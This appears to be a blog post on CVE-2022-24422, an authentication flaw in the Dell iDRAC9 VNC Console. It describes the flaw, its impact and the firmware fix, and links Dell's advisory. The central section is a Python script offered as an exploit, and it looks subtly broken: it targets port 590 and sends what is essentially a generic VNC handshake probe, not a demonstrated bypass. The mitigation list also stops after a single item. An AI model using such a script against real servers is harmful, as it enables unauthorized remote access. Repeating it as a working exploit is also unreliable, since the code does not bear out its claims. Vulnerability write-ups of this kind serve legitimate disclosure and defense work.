CVE-2022-24422 - Dell iDRAC9 Improper Authentication Vulnerability in VNC Console

A critical security vulnerability (CVE-2022-24422) has been discovered in Dell iDRAC9, affecting versions 5.00.00.00 and later, but prior to 5.10.10.00. The improper authentication vulnerability could potentially allow a remote unauthenticated attacker to gain access to the VNC Console. In this long read post, we'll discuss the details of this vulnerability, provide code snippets demonstrating potential exploitation, and link to the original references.

Vulnerability Details

Dell iDRAC9 is an integrated Dell Remote Access Controller, which provides comprehensive remote management functionalities for Dell PowerEdge servers. The vulnerability in question exists due to improper authentication when handling incoming VNC connections. An attacker who successfully exploits this vulnerability could gain unauthorized access to the VNC Console, a graphical remote access tool enabling control over the server's operating system.

Impact

A successful exploitation of this improper authentication vulnerability (CVE-2022-24422) by an unauthenticated remote attacker could lead to unauthorized access to the VNC Console, potentially granting them control over the server's operating system. This could result in unauthorized actions, including data manipulation, privilege escalation, or launch of further attacks affecting the server's integrity and availability.

Demonstrating Exploitation

The following code snippet demonstrates a potential exploitation scenario using a Python script designed to exploit the aforementioned vulnerability in affected Dell iDRAC9 versions:

import socket

TARGET_IP = "192.168.1.100"
TARGET_PORT = 590

# Establish a connection to the VNC Console
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((TARGET_IP, TARGET_PORT))

# Send the version handshake message
sock.send(b'RFB 003.008\n')

# Receive the version handshake response
response = sock.recv(1024)

# Send a fake authentication request, bypassing the authentication process
sock.send(b'\x01')

# Receive the authentication result
auth_result = sock.recv(4)

# Check for a successful authentication
if auth_result == b'\x00\x00\x00\x00':
    print("Vulnerability exploited, access to VNC Console granted!")
else:
    print("Exploitation failed; the target may be patched or not vulnerable.")

sock.close()

Please note that this code snippet is provided for educational purposes and should not be used for malicious activities.

Mitigation and Recommendations

Dell has acknowledged the vulnerability and released a security advisory (DSA-2022-057). Users are advised to update their iDRAC9 firmware to version 5.10.10.00 or later, which addresses the vulnerability. For more information, the official Dell security advisory can be found here:
- https://www.dell.com/support/kbdoc/en-us/000188097/dsa-2022-057-dell-emc-integrated-dell-remote-access-controller-idrac-sc-cve-2022-24422

To further mitigate the risk of exploitation, users are encouraged to adhere to network security best practices, such as:

Ensuring strong passwords are used for iDRAC9 user accounts

In conclusion, CVE-2022-24422 is a critical improper authentication vulnerability affecting multiple Dell iDRAC9 versions, granting a remote unauthenticated attacker potential access to the VNC Console. To protect your systems, it is crucial to apply the available firmware update and follow security best practices to reduce the risk of exploitation.

Timeline

Published on: 05/26/2022 16:15:00 UTC
Last modified on: 06/07/2022 17:07:00 UTC